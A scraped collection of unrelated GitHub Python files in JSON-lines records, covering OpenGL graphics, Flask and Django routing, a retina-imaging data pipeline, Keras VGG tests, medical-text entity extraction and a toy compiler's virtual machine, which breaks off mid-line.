0.001\n# beta_guess = 1\n# c_guess = np.mean(adj)\n# param_guess = np.array([alpha_guess, beta_guess, c_guess])\n# n_iter = 4\n# parameters = [param_guess]\n# permutations = []\n# for i in range(n_iter):\n# perm = fit_gm_exp(adj, *param_guess, n_init=n_init)\n# perm_adj = adj[np.ix_(perm, perm)]\n# ys, xs = get_vals_by_k(ks, perm_adj)\n# ps = calc_p_by_k(ks, perm_adj)\n# param_guess, _ = curve_fit(exp_func, xs, ys, p0=param_guess)\n# parameters.append(param_guess)\n# permutations.append(perm)\n\n# #%%\n# fig, axs = plt.subplots(3, n_iter, figsize=(5 * n_iter, 15))\n\n# for i, (params, perm) in enumerate(zip(parameters, permutations)):\n# perm_adj = adj[np.ix_(perm, perm)]\n\n# exp = exp_func(ks, *params)\n\n# ax = axs[0, i]\n# ax.set_title(f\"Iteration {i}\")\n\n# sns.lineplot(x=ks, y=calc_p_by_k(ks, perm_adj), ax=ax, label=r\"$\\hat{P}$\")\n# sns.lineplot(x=ks, y=exp, ax=ax, label=r\"Match matrix\")\n# if i > 0:\n# ax.get_legend().remove()\n# ax.set_xlabel(\"k\")\n# ax.set_xticks([])\n\n# # matching matrix\n# # adjplot(match, ax=axs[0, i], cbar=False)\n# # adjacency\n# _, _, top, _ = adjplot(perm_adj, colors=labels[perm], ax=axs[1, i], cbar=False)\n# # top.set_title(alpha)\n# # ranks\n# plot_df[\"y\"] = perm\n# ax = axs[2, i]\n# sns.scatterplot(data=plot_df, ax=ax, **scatter_kws)\n# format_order_ax(ax)\n# plot_diag_boxes(ax)\n# plot_scores(perm, ax)\n\n# axs[-1, 0].set_ylabel(\"Predicted order\")\n# axs[0, 0].set_ylabel(\"y\")\n# # fig.suptitle(\"Oracle parameter estimates (a, b, c)\", y=0.95)\n# stashfig(\"em-fits\" + basename)\n\n\n# # %%\n","repo_name":"neurodata/maggot_models","sub_path":"notebooks/167.0-BDP-gm-flow-sim.py","file_name":"167.0-BDP-gm-flow-sim.py","file_ext":"py","file_size_in_byte":25795,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"42200729346","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 16 13:55:19 2019\n\n@author: jyothyrajs\n\"\"\"\nimport os\nimport sys\ndef timeConversion(s):\n hr,minute,sec = s.split(':')\n nhr=hr\n if(sec[2:4] == 'PM' and int(hr)<12 ):\n nhr= int(hr)+12\n \n if(sec[2:4] == 'AM' and int(hr)==12):\n nhr = 00\n sec = sec.rstrip(\".APM\")\n s1 = \"{}:{}:{}\"\n s2 = \"0{}:{}:{}\" \n if(int(nhr)==0):\n return s2.format(nhr,minute,sec)\n return s1.format(nhr,minute,sec)\nif __name__ == '__main__':\n # f = open(os.environ['OUTPUT_PATH'], 'w')\n\n s = input()\n\n result = timeConversion(s)\n print(result)\n\n # f.write(result + '\\n')\n\n # f.close()\n","repo_name":"Jyothyrajs/Python","sub_path":"timeconversion.py","file_name":"timeconversion.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"850603529","text":"from OpenGL.GL import *\nfrom OpenGL.GLUT import *\nimport sys\nfrom Canvas import Canvas\n\n# if MOVEMENT_MODE is 0, a figure can move in all directions\n# else figure can move only along vector (-1, 0)\nMOVEMENT_MODE = 0\n\n\nclass Window:\n\n def __init__(self, width, height, window_name, coeff=10, grid_coeff=30):\n self.width = width\n self.height = height\n self.window_name = window_name\n self.canvas = Canvas(width, height, coeff, grid_coeff)\n\n def apply_settings(self):\n # bg color, viewport settings and (0, 0) position\n glViewport(0, 0, self.width, self.height)\n glClearColor(0, 0.5, 0.5, 1)\n glLoadIdentity()\n glMatrixMode(GL_PROJECTION)\n glOrtho(0, self.width, 0, self.height, 1.0, -1.0)\n\n def show(self, pos_x=0, pos_y=0):\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_RGBA)\n glutInitWindowSize(self.width, self.height)\n glutInitWindowPosition(pos_x, pos_y)\n glutCreateWindow(self.window_name)\n # bg color, viewport settings and (0, 0) position\n self.apply_settings()\n # set callback functions\n glutDisplayFunc(self.canvas.display_figure)\n glutReshapeFunc(self.reshape)\n glutKeyboardFunc(self.keyboard)\n glutMouseFunc(self.mouse_func)\n glutMotionFunc(self.motion_func)\n glutMouseWheelFunc(self.wheel_func)\n glutMainLoop()\n\n def set_figure_pos(self, x, y):\n # placing a figure in the beginning of execution\n self.canvas.fpos_x = x\n self.canvas.fpos_y = y\n\n def reshape(self, w, h):\n # compute a new figure position in reshaped window\n self.canvas.fpos_x *= w / self.canvas.width\n self.canvas.fpos_y *= h / self.canvas.height\n # new width and height of reshaped window\n self.width = self.canvas.width = w\n self.height = self.canvas.height = h\n # viewport settings and (0, 0) position\n self.apply_settings()\n # apply changes\n self.canvas.update()\n\n def keyboard(self, key, x, y):\n pressed_key = key.decode(\"utf-8\").lower()\n if pressed_key == chr(27):\n sys.exit(0)\n if pressed_key == ' ':\n self.canvas.fpos_x = self.width / 2\n self.canvas.fpos_y = self.height / 2\n if MOVEMENT_MODE:\n if pressed_key == 'w' or pressed_key == 's':\n if 0 < self.canvas.fpos_x:\n self.canvas.fpos_x -= self.canvas.grid_coeff\n elif pressed_key == 'a' or pressed_key == 'd':\n if self.canvas.fpos_x < self.width:\n self.canvas.fpos_x += self.canvas.grid_coeff\n else:\n if pressed_key == 'w':\n if self.canvas.fpos_y + self.canvas.grid_coeff < self.height:\n self.canvas.fpos_y += self.canvas.grid_coeff\n elif pressed_key == 's':\n if self.canvas.fpos_y - self.canvas.grid_coeff > 0:\n self.canvas.fpos_y -= self.canvas.grid_coeff\n elif pressed_key == 'd':\n if self.canvas.fpos_x + self.canvas.grid_coeff < self.width:\n self.canvas.fpos_x += self.canvas.grid_coeff\n elif pressed_key == 'a':\n if self.canvas.fpos_x - self.canvas.grid_coeff > 0:\n self.canvas.fpos_x -= self.canvas.grid_coeff\n self.canvas.update()\n glutPostRedisplay()\n\n def mouse_func(self, button, state, x, y):\n # remember coordinates when mouse button was pressed\n self.canvas.pressed_x = x\n self.canvas.pressed_y = y\n\n def motion_func(self, x, y):\n # compute the distance the pointer has gone\n dx = x - self.canvas.pressed_x\n dy = y - self.canvas.pressed_y\n # move figure coordinates\n if 0 < self.canvas.fpos_x + dx < self.canvas.width:\n self.canvas.fpos_x += dx\n if 0 < self.canvas.fpos_y - dy < self.canvas.height:\n self.canvas.fpos_y -= dy\n # remember coordinates when pointer is moving\n self.canvas.pressed_x = x\n self.canvas.pressed_y = y\n # apply changes\n self.canvas.update()\n # call display function\n glutPostRedisplay()\n\n def wheel_func(self, wheel, direction, x, y):\n # if mouse wheel is moving forward zoom in\n if direction > 0 and self.canvas.coeff < 60:\n self.canvas.coeff += 5\n # if mouse wheel is moving backward zoom out\n elif direction < 0 and self.canvas.coeff > 5:\n self.canvas.coeff -= 5\n # apply changes\n self.canvas.update()\n # call display function\n glutPostRedisplay()\n","repo_name":"sergey-judi/opengl-python","sub_path":"Lab1/Window.py","file_name":"Window.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20925212734","text":"import enum\nfrom docxtpl import DocxTemplate\nfrom docx2pdf import convert\nimport pandas as pd\ndf_test=pd.read_csv(\"data test.csv\",sep=\";\")\ndoc=DocxTemplate(\"PlantillaRHE.docx\")\nprint(df_test)\ndata_test=df_test.to_dict()\nfor idx,emi in enumerate(data_test['RUC EMISOR']):\n context={\n \"rucProvider\":data_test['RUC EMISOR'][idx],\n \"rucClient\":data_test['RUC RECEPTOR'][idx],\n \"nameProvider\":data_test['NOMBRE EMISOR'][idx],\n \"nameClient\":data_test['NOMBRE RECEPTOR'][idx],\n \"amountBrut\":'{:.2f}'.format(data_test['PRECIO'][idx]),\n \"amountNet\":'{:.2f}'.format(data_test['PRECIO'][idx]),\n \"serialNumber\":data_test['SERIE'][idx],\n \"id\":'{:02.0f}'.format(data_test['NUMERO DOCUMENTO'][idx])\n }\n file_name=f\"{data_test['RUC EMISOR'][idx]}_{'{:02.0f}'.format(data_test['TIPO DOCUMENTO'][idx])}_{data_test['SERIE'][idx]}_{data_test['NUMERO DOCUMENTO'][idx]}\"\n print(file_name)\n doc.render(context)\n doc.save(f\"{file_name}.docx\")\n pdfpath = file_name+'.pdf'\n xmlpath = file_name+'.xml'\n convert(f\"{file_name}.docx\", pdfpath)\n #convert(f\"{file_name}.docx\", xmlpath)\nprint(\"listos\")\n","repo_name":"danielichis/pdf_xmls_validators","sub_path":"files_generator.py","file_name":"files_generator.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12117802991","text":"# importing necessary modules & functions from workload.py\nimport collections\nimport numpy as np\nimport sys\nfrom flask import Flask\nfrom flask import render_template, request\n\nsys.path.append(\"/Users/2020abardhan/Desktop/workload/flaskproject-master/app/\")\nimport workload\nfrom workload import Order, Item, pretty_print_w, assign_time, order_orders, output_table\n\n# inits flask app w debugger on\napp = Flask(__name__)\napp.debug = True\n\n@app.route('/')\n@app.route('/base', methods=['GET'])\ndef index():\n out = ['', '', '', '', '']\n return render_template('base.html', out=out)\n\n@app.route('/order', methods=['POST'])\ndef order_now():\n order1 = Order()\n item1_1 = Item()\n order1.id = request.form['order_id']\n item1_1.type = request.form['order_item']\n #day = request.form['day']\n order1.items = [item1_1]\n\n orders = [order1]\n #get orders in order of their importance\n ordered_orders = order_orders(orders)\n #assign the orders to each day of the work week\n work_week = assign_time(ordered_orders, 100)\n #print out new schedule\n out = output_table(work_week)\n\n return render_template('base.html', out=out)\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"anish-bardhan/compsci_IA","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18602061480","text":"from django.conf.urls import url\nfrom django.contrib import admin\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name = \"index\"),\n url(r'^register$', views.register, name =\"register\"),\n url(r'^dashboard$', views.dashboard, name =\"dashboard\"),\n url(r'^dashboard/admin$', views.admin_dashboard, name =\"admin_dashboard\"),\n url(r'^login$', views.login, name=\"login\"),\n # url(r'^users/new$', views.create_user, name=\"create\"),\n url(r'^users/edit/(?P\\d+)/$', views.admin_edit_user, name=\"admin_edit_user\"),\n url(r'^users/update/(?P\\d+)/$', views.edit_user_info, name=\"edit_user_info\"),\n url(r'^users/delete/(?P\\d+)/$', views.delete_user_info, name=\"delete_user_info\"),\n url(r'^logout$', views.log_out, name=\"log_out\"),\n]","repo_name":"mhn-mnsr/DojoAssignments","sub_path":"Python/Django_projects/user_dashboard/apps/users_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72384924009","text":"import os\nimport inspect\nimport hashlib\nimport h5py\nimport datajoint as dj\nimport numpy as np\n\n\nschema = dj.schema('dklindt_bipolar_data', locals())\n\nPATH = os.path.dirname(os.path.dirname(os.path.dirname(inspect.stack()[0][1])))\nDATA_PATH = os.path.join(PATH, 'data/bipolar')\n\nNUM_CLIPS = 108\nNUM_VAL_CLIPS = 15\nrnd = np.random.RandomState(seed=2364782)\nVAL_CLIP_IDX = set(rnd.choice(NUM_CLIPS, NUM_VAL_CLIPS, replace=False))\nTRAIN_CLIP_IDX = set(range(NUM_CLIPS)) - VAL_CLIP_IDX\n\nclass Dataset:\n def __init__(self,\n movie_train,\n movie_test,\n movie_ordering,\n movie_trigger_times,\n responses,\n response_trigger_times):\n\n # preprocess images (mean=0, SD=1)\n m = images_train.mean()\n sd = images_train.std()\n zscore = lambda img: (img - m) / sd\n self.images_train = zscore(images_train)[...,None]\n self.images_val = zscore(images_val)[...,None]\n self.images_test = zscore(images_test)[...,None]\n \n # preprocess responses (SD=1)\n sd = responses_train.std(axis=0)\n sd[sd < (sd.mean() / 100)] = 1\n def rectify_and_normalize(x):\n x[x < 0] = 0\n return x / sd\n self.responses_train = rectify_and_normalize(responses_train)\n self.responses_val = rectify_and_normalize(responses_val)\n self.responses_test = rectify_and_normalize(responses_test)\n \n self.num_neurons = responses_train.shape[1]\n self.num_train_samples = images_train.shape[0]\n self.px_x = images_train.shape[2]\n self.px_y = images_train.shape[1]\n self.input_shape = [None, self.px_y, self.px_x, 1]\n self.next_epoch()\n\n def val(self):\n return self.images_val, self.responses_val\n\n def train(self):\n return self.images_train, self.responses_train\n\n def test(self, averages=True):\n responses = self.responses_test.mean(axis=0) if averages else self.responses_test\n return self.images_test, responses\n\n def minibatch(self, batch_size):\n if self.minibatch_idx + batch_size > self.num_train_samples:\n self.next_epoch()\n idx = self.train_perm[self.minibatch_idx + np.arange(0, batch_size)]\n self.minibatch_idx += batch_size\n return self.images_train[idx, :, :], self.responses_train[idx, :]\n\n def next_epoch(self):\n self.minibatch_idx = 0\n self.train_perm = np.random.permutation(self.num_train_samples)\n\n\n@schema\nclass Scan(dj.Lookup):\n definition = \"\"\" # Bipolar cells with iGluSnfr\n animal_id : int # animal id\n retina : ENUM(\"L\", \"R\") # retina side\n scan_idx : tinyint # scan index\n ---\n folder : varchar(255) # folder name\n \"\"\"\n\n contents = [\n [1, 'R', 2, 'pilot1'],\n [1, 'R', 3, 'pilot1'],\n [1, 'R', 4, 'pilot1'],\n [2, 'L', 0, 'pilot2/LeftRetina/IPL0'],\n [2, 'R', 0, 'pilot2/rightretina/IPL0'],\n [2, 'R', 1, 'pilot2/rightretina/IPL1'],\n [2, 'R', 2, 'pilot2/rightretina/IPL2'],\n [2, 'R', 3, 'pilot2/rightretina/IPL3'],\n [2, 'R', 4, 'pilot2/rightretina/IPL4'],\n ]\n\n\n@schema\nclass StimulusLookup(dj.Lookup):\n definition = \"\"\" # Stimulus types\n stimulus_id : tinyint unsigned # stimulus id\n ---\n stimulus_name : varchar(255) # name of stimulus\n \"\"\"\n\n contents = [\n [1, 'step'],\n [2, 'local chirp'],\n [3, 'global chirp'],\n [4, 'natural movies raw'],\n [5, 'natural movies equalized'],\n [6, 'dense noise'],\n ]\n\n\n@schema\nclass NaturalMovies(dj.Lookup):\n definition = \"\"\"\n -> StimulusLookup\n ---\n train_movie_file : varchar(255) # file containing movie frames\n test_movie_file : varchar(255) # file containing movie frames\n \"\"\"\n\n contents = [\n [4, 'movies_train.tiff', 'movies_test.tiff'],\n [5, 'train.tiff', 'test.tiff'],\n ]\n\n\n@schema\nclass MovieSplits(dj.Lookup):\n definition = \"\"\"\n clip_idx : int unsigned # clip index\n ---\n split : ENUM(\"train\", \"val\") # train or validation set?\n \"\"\"\n \n @property\n def contents(self):\n contents = []\n for clip_idx in range(NUM_CLIPS):\n contents += [[float(clip_idx),\n 'val' if clip_idx in VAL_CLIP_IDX else 'train']]\n return contents\n \n\n@schema\nclass Stimulus(dj.Lookup):\n definition = \"\"\" # Stimuli shown\n -> Scan\n -> StimulusLookup\n ---\n data_file : varchar(255) # name of data file\n \"\"\"\n \n @property\n def contents(self):\n contents = [\n [1, 'R', 2, 4, 'SMP_M1_RR_IPL2_NM.h5'],\n [1, 'R', 2, 6, 'SMP_M1_RR_IPL2_DN.h5'],\n [1, 'R', 3, 4, 'SMP_M1_RR_IPL3_NM.h5'],\n [1, 'R', 3, 6, 'SMP_M1_RR_IPL3_DN.h5'],\n [1, 'R', 4, 4, 'SMP_M1_RR_IPL4_NM.h5'],\n [1, 'R', 4, 6, 'SMP_M1_RR_IPL4_DN.h5'],\n [2, 'L', 0, 1, 'SMP_M1_LR_IPL0_1s.h5'],\n [2, 'L', 0, 2, 'SMP_M1_LR_IPL0_lChirp.h5'],\n [2, 'L', 0, 3, 'SMP_M1_LR_IPL0_Chirp.h5'],\n [2, 'L', 0, 5, 'SMP_M1_LR_IPL0_NM.h5'],\n [2, 'L', 0, 6, 'SMP_M1_LR_IPL0_DN.h5'],\n ]\n for i in range(5):\n contents += [\n [2, 'R', i, 1, 'SMP_M1_RR_IPL{}_1s.h5'.format(i)],\n [2, 'R', i, 2, 'SMP_M1_RR_IPL{}_lChirp.h5'.format(i)],\n [2, 'R', i, 3, 'SMP_M1_RR_IPL{}_Chirp.h5'.format(i)],\n [2, 'R', i, 5, 'SMP_M1_RR_IPL{}_NM.h5'.format(i)],\n [2, 'R', i, 6, 'SMP_M1_RR_IPL{}_DN.h5'.format(i)],\n ] \n return contents\n\n def num_rois(self):\n file_name = os.path.join(DATA_PATH, self.fetch1('data_file'))\n file = h5py.File(file_name, 'r')\n return len(list(file['Traces0_raw'])[0])\n \n def load_data(self):\n file_name = self.fetch1('data_file')\n # TODO: load files\n return Dataset(movie_train,\n movie_test,\n movie_ordering,\n movie_trigger_times,\n responses,\n response_trigger_times)\n\n\n@schema\nclass MultiDataset(dj.Lookup):\n definition = \"\"\" # Dataset consisting of multiple scans\n data_hash : char(32) # unique identifier for dataset\n ---\n restriction : varchar(255) # description\n \"\"\"\n \n _order_members_by = 'animal_id ASC, retina ASC, scan_idx ASC'\n \n class Member(dj.Part):\n definition = \"\"\" # Scans and stimuli that are part of this dataset\n -> master\n member_id : tinyint unsigned # member id\n ---\n -> Stimulus\n \"\"\"\n\n class Roi(dj.Part):\n definition = \"\"\" # Scans that are part of this dataset\n -> master\n roi_id : int unsigned # ROI id\n ---\n -> master.Member\n \"\"\"\n\n def fill(self):\n restrictions = [\n 'animal_id=1 and stimulus_id=4',\n 'animal_id=2 and stimulus_id=5',\n ]\n for i, r in enumerate(restrictions):\n data_hash = hashlib.md5(str(i).encode()).hexdigest()\n key = dict(data_hash=data_hash, restriction=r)\n if not len(self & key):\n self.insert1(key)\n n = 0\n for j, tupl in enumerate(\n (self * Stimulus() & key & r).fetch(\n dj.key, order_by=self._order_members_by)):\n tupl['member_id'] = j\n self.Member().insert1(tupl)\n num_rois = (Stimulus() & tupl).num_rois()\n rois = [{'data_hash': data_hash, 'member_id': j, 'unit_id': n+k} for k in range(num_rois)]\n n += num_rois\n self.Roi().insert(rois)\n\n\n def load_data(self):\n assert len(self) == 1, 'Relation must be scalar.'\n data = []\n for key in (self * self.Member).fetch(dj.key):\n data.append((Stimulus() & key).load_data())\n return data\n","repo_name":"aecker/cnn-sys-ident","sub_path":"cnn_sys_ident/bipolar/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":8238,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"74167206247","text":"\"\"\"\nkeras 自带 vgg 模型\n\"\"\"\nfrom tensorflow.keras.applications import vgg16, vgg19\nfrom tensorflow import keras\n\n\n\ndef test_0():\n \"\"\"\n 使用 keras 自带的 VGG 模型\n\n include_top:是否要最后的 3 层全连接层\n weights: Node 随机初始化,'imagenet' 下载从 ImageNet 训练的权重\n \"\"\"\n vgg_16 = vgg16.VGG16(input_shape=(224, 224, 3),\n weights=None,\n include_top=False,\n backend=keras.backend,\n layers=keras.layers,\n models=keras.models,\n utils=keras.utils)\n vgg_16.summary()\n\ndef test_1():\n \"\"\"\n VGG19\n \"\"\"\n vgg_19 = vgg19.VGG19(input_shape=(224, 224, 3),\n weights=None,\n include_top=False,\n backend=keras.backend,\n layers=keras.layers,\n models=keras.models,\n utils=keras.utils)\n print(type(vgg_19))\n print(vgg_19.summary())\n\n\nif __name__ == '__main__':\n test_0()","repo_name":"jelly-lemon/deep_learning_study","sub_path":"VGG_study/vgg_study.py","file_name":"vgg_study.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"86356987940","text":"# -*- coding:utf-8 -*-\r\n'''\r\nCreate time: 2020/4/10 13:55\r\n@Author: 大丫头\r\n'''\r\nimport csv\r\nimport tagme\r\nimport requests\r\nimport pickle\r\n\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\n\r\nprint(requests.__version__)\r\n\r\nrequests.adapters.DEFAULT_RETRIES = 2 # 增加重连次数\r\ntagme.GCUBE_TOKEN=\"9e16d353-0c47-4fef-8ccc-676a8591f478-843339462\"\r\n\r\nproxies = {\r\n \"https\": \"127.0.0.1:8001\"\r\n}\r\n\r\n# 从电子病历中提取实体\r\ndef extract_entity(filename,label_desc):\r\n '''\r\n :param filename:电子病历文件\r\n :param label_desc:ICD以及对应的描述(dict)\r\n :return:\r\n label_entity.pkl 文件:每个label对应的实体list(dict)\r\n EHR-label-entity-kg.csv文件:相比filename增加了EHR对应的实体这一列\r\n '''\r\n # 结果写入文件\r\n writer_f=open('data/EHR-label-entity-kg.csv','w',newline='')\r\n writer=csv.writer(writer_f)\r\n label_entity_EHR_related={}\r\n #打开文件\r\n with open(filename,'r') as f:\r\n reader=csv.reader(f)\r\n data=[row for row in reader][1:]\r\n for row in data:\r\n # 原数据:SUBJECT_ID,HADM_ID,TEXT,LABELS\r\n print('row:',row)\r\n count=0\r\n # 利用tagme提取其中的实体\r\n #row='group of metabolic disorders characterized by high blood sugar levels over a prolonged period'\r\n try:\r\n tomatoes_mentions = tagme.mentions(row[2])\r\n mentions=tomatoes_mentions.mentions\r\n # 将数据写入文件中\r\n content=[row[0],row[1],row[2],0,row[3]]\r\n content[3]=';'.join([mention.__str__().strip().split('[')[0][:-1] for mention in mentions])\r\n if len(content)>0:\r\n writer.writerow(content)\r\n count+=1\r\n except:\r\n pass\r\n labels=row[3].split(';')\r\n for label in labels:\r\n if label in label_desc:\r\n desc = label_desc.get(label)\r\n try:\r\n tomatoes_mentions = tagme.mentions(desc)\r\n mentions = tomatoes_mentions.mentions\r\n if label not in label_entity_EHR_related:\r\n label_entity_EHR_related[label]=[mention.__str__().strip().split('[')[0][:-1] for mention in mentions]\r\n except:\r\n label_entity_EHR_related[label] = []\r\n else:\r\n label_entity_EHR_related[label] = []\r\n print(label_entity_EHR_related.get(label))\r\n\r\n writer_f.close()\r\n # 将label_entity_EHR_related保存下来 以备后面的使用\r\n with open('data/label_entity.pkl','wb') as f:\r\n pickle.dump(label_entity_EHR_related,f)\r\n\r\n\r\ndef get_label_desc(ICD_desc_file):\r\n '''\r\n :param ICD_desc_file: ICD的描述文件即ICD9_descriptions.txt\r\n :return:label_desc:每个ICD对应的描述(dict)\r\n '''\r\n label_desc={}\r\n # 打开label描述文件\r\n with open(ICD_desc_file,'r') as f:\r\n lines=f.readlines()\r\n for line in lines:\r\n print(repr(line))\r\n label,desc=line[:-1].split('\\t')\r\n if label not in label_desc:\r\n label_desc[label]=desc\r\n return label_desc\r\n\r\nif __name__ == '__main__':\r\n # step1: extract entity\r\n label_desc=get_label_desc('data/ICD9_descriptions.txt')\r\n extract_entity('data/note_labeled_test.csv',label_desc)\r\n\r\n","repo_name":"WOW5678/CoGraph","sub_path":"simple_wikidata_process_EHR.py","file_name":"simple_wikidata_process_EHR.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"14252046406","text":"# ****************\n# SUMA HETEROGÉNEA\n# ****************\n\n\ndef run(items: list) -> int:\n to_dec = [int(i) for i in items]\n sum_items = sum(to_dec)\n\n return sum_items\n\n\nif __name__ == '__main__':\n run([1, '2', 3, '4', 5])","repo_name":"RobertGiantSteps/PRO","sub_path":"LISTAS/sum_mixed.py","file_name":"sum_mixed.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74171142569","text":"\"\"\"\n Proyecto Final\n Autor: Óscar Antonio Hinojosa Salum A00821930\n Mayo 28 2023\n Compilador para lenguaje al estilo R/C++.\n\n --- VM / Virtual Machine / Máquina Virtual ---\n\"\"\"\n\n# ======================== Virtual Machine ======================== #\n\nimport pprint\nimport copy\nimport re\n\nclass VirtualMachine:\n def __init__(self):\n self.memorySize = 500 # ! CRITICAL ! \"IndexError: list assignment index out of range\"\n self.registers = [None] * self.memorySize\n self.registers[0] = \"GOTO MAIN\"\n self.functionJumps = []\n self.program_counter = 0\n self.quadruples = []\n self.symbolTable = []\n # For recursion, oh boy\n self.recursiveIteration = 0\n self.recursiveRegisters = []\n self.recursiveTable = []\n self.returns = []\n\n\n def start(self, quadruples, newSymbolTable):\n self.quadruples = quadruples\n self.symbolTable = newSymbolTable\n self.run()\n\n\n def run(self):\n \"\"\"\n !run\n * Cuádruplos en forma de tuplas tipo:\n * [operador, operandoIzquierdo, operandoDerecho, dondeInsertarResultado]\n ? Resultados del programa\n \"\"\"\n \n while self.program_counter < len(self.quadruples):\n operator, operand1, operand2, target = copy.deepcopy(self.quadruples[self.program_counter])\n\n # Qué asco ya sé, una búsqueda lineal O(n) por cada operando que sea una variable...\n # Si nuestro resultado será un espacio temporal, lo \"hacemos\" índice (t1 = 1, t82 = 82, ...)\n # \"t0\", al \"no existir\", lo dejé reservado para el GOTO MAIN por si acaso y mientras\n isTargetTemp = False # Exclusivo para los returns\n if isinstance(target, str) and re.match(r\"^t\\d+$\", target) :\n isTargetTemp = True\n target = int(target[1:])\n # self.registers.append(target) # ? Could this turn registers into a dynamic memory/vector? Adaptable size\n \n isOperand1Str = isinstance(operand1, str)\n isOperand2Str = isinstance(operand2, str)\n\n # Si nuestro operando izquierdo es un espacio temporal ...\n if isOperand1Str and re.match(r\"^t\\d+$\", operand1) and operator != 'GOSUB' : \n if len(self.recursiveRegisters) > 0 : operand1 = self.recursiveRegisters[-1][int(operand1[1:])]\n else : operand1 = self.registers[int(operand1[1:])]\n # Si no, debe ser un ID cuyo valor debemos sacar de la SymbolTable\n elif isOperand1Str :\n foundRecursiveVar = False\n if self.recursiveIteration > 0:\n table = self.recursiveTable[-1]\n for tuple in table :\n if operand1 == tuple[1] :\n foundRecursiveVar = True\n # Si es una lista de un solo elemento, sacarlo\n if isinstance(tuple[6], list) and len(tuple[6]) == 1 : operand1 = tuple[6][0]\n # Si sufrió alguna actualización antes de aquí, lo más seguro es\n # que ya no es una lista de un elemento, sino número o string ...\n else : operand1 = tuple[6]\n break\n if not foundRecursiveVar:\n for tuple in self.symbolTable :\n if operand1 == tuple[1] :\n # Si es una lista de un solo elemento, sacarlo\n if isinstance(tuple[6], list) and len(tuple[6]) == 1 : operand1 = tuple[6][0]\n # Si sufrió alguna actualización antes de aquí, lo más seguro es\n # que ya no es una lista de un elemento, sino número o string ...\n else : operand1 = tuple[6]\n break\n\n # Para lidiar con condicionales, el problema de bool() es que si es una string\n # con valor de 'False' la convierte a un booleano True porque lo que checa es que\n # la string está vacía o no. El que nos interesa es eval(), pero solo funciona con\n # strings; no importa si usamos bool() para valores numéricos\n if operand1 == 'True' or operand1 == \"False\" :\n operand1 = eval(operand1)\n\n # Si nuestro operando derecho es un espacio temporal ...\n if isOperand2Str and re.match(r\"^t\\d+$\", operand2) and operator != 'GOSUB' : \n if len(self.recursiveRegisters) > 0 : operand2 = self.recursiveRegisters[-1][int(operand2[1:])]\n else : operand2 = self.registers[int(operand2[1:])]\n # Si no, debe ser un ID cuyo valor debemos sacar de la SymbolTable\n elif isOperand2Str:\n foundRecursiveVar = False\n if self.recursiveIteration > 0:\n table = self.recursiveTable[-1]\n for tuple in table :\n if operand2 == tuple[1] :\n foundRecursiveVar = True\n # Si es una lista de un elemento, sacarlo\n if isinstance(tuple[6], list) : operand2 = tuple[6][0]\n else : operand2 = tuple[6]\n break\n if not foundRecursiveVar:\n for tuple in self.symbolTable :\n if operand2 == tuple[1] :\n # Si es una lista de un elemento, sacarlo\n if isinstance(tuple[6], list) : operand2 = tuple[6][0]\n else : operand2 = tuple[6]\n break\n\n if operand2 == 'True' or operand2 == \"False\" :\n operand2 = eval(operand2)\n\n if operand1 == None : operand1 = 1\n if operand2 == None : operand2 = 1\n \n \n\n # ======= REGISTERS ========\n if operator == '+':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = operand1 + operand2\n else : self.registers[target] = operand1 + operand2\n elif operator == '-':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = operand1 - operand2\n else : self.registers[target] = operand1 - operand2\n elif operator == '*':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = operand1 * operand2\n else : self.registers[target] = operand1 * operand2\n elif operator == '**':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = operand1 ** operand2\n else : self.registers[target] = operand1 ** operand2\n elif operator == '/':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = operand1 / operand2\n else : self.registers[target] = operand1 / operand2\n elif operator == '>':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = int(operand1 > operand2)\n else : self.registers[target] = int(operand1 > operand2)\n elif operator == '<':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = int(operand1 < operand2)\n else : self.registers[target] = int(operand1 < operand2)\n elif operator == '<=':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = int(operand1 <= operand2)\n else : self.registers[target] = int(operand1 <= operand2)\n elif operator == '>=':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = int(operand1 >= operand2)\n else : self.registers[target] = int(operand1 >= operand2)\n elif operator == '==':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = bool(operand1) == bool(operand2)\n else : self.registers[target] = bool(operand1) == bool(operand2)\n elif operator == '!=' or operator == '<>':\n if 